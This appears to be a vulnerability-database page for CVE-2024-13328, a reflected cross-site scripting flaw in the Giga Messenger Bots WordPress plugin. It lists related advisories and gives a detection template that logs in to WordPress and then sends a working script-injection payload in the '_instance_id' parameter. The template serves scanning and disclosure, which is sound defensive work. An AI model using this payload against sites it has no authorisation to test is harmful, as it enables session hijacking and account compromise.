| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| CVE-2024-13328 | 4 Feb 202506:16 | – | circl | |
| WordPress plugin Giga Messenger 安全漏洞 | 4 Feb 202500:00 | – | cnnvd | |
| CVE-2024-13328 | 4 Feb 202506:00 | – | cve | |
| CVE-2024-13328 Giga Messenger Bots <= 2.3.1 - Reflected XSS | 4 Feb 202506:00 | – | cvelist | |
| EUVD-2024-51533 | 3 Oct 202520:07 | – | euvd | |
| CVE-2024-13328 | 4 Feb 202506:15 | – | nvd | |
| WordPress Giga Messenger Bots plugin <= 2.3.1 - Reflected XSS vulnerability | 4 Feb 202522:28 | – | patchstack | |
| PT-2025-2114 | 4 Feb 202500:00 | – | ptsecurity | |
| CVE-2024-13328 | 8 Feb 202504:35 | – | redhatcve | |
| CVE-2024-13328 Giga Messenger Bots <= 2.3.1 - Reflected XSS | 4 Feb 202506:00 | – | vulnrichment |
id: CVE-2024-13328
info:
name: Giga Messenger WordPress - Cross-Site Scripting
author: Sourabh-Sahu
severity: medium
description: |
Giga Messenger WordPress plugin <= 2.3.1 contains a reflected cross-site scripting caused by lack of sanitization and escaping of a parameter before outputting it in the page, letting attackers execute malicious scripts in the context of high privilege users, exploit requires attacker to craft a malicious link or request.
impact: |
Attackers can execute malicious scripts in the context of high privilege users, potentially leading to session hijacking or account compromise.
remediation: |
Update to the latest version of the plugin where the vulnerability is fixed.
reference:
- https://wpscan.com/vulnerability/543a209b-c43c-46fc-8369-edb3b7e0ca98/
- https://nvd.nist.gov/vuln/detail/CVE-2024-13328
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2024-13328
cwe-id: CWE-79
epss-score: 0.00567
epss-percentile: 0.42925
cpe: cpe:2.3:a:tanng:giga_messenger:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: tanng
product: giga_messenger
tags: cve,cve2024,wordpress,wp-plugin,xss,giga-messenger
flow: http(1) && http(2)
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to={{RootURL}}/wp-admin/&testcookie=1
matchers:
- type: dsl
dsl:
- status_code == 302
- contains(header, "wordpress_logged_in")
condition: and
internal: true
- raw:
- |
GET /wp-admin/admin.php?page=giga&_instance_id=1"></script><script>alert(document.domain)</script><script> HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- status_code == 200
- contains_all(body, "></script><script>alert(document.domain)</script><script>")
condition: and
# digest: 4a0a00473045022100afe1eb4cc5213952448320bc22e79a5af68e6266313d567932bde7a123774b08022008136341492b91512bad1842112ef3232646549292a85b1ff816cb9af035bf3b:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation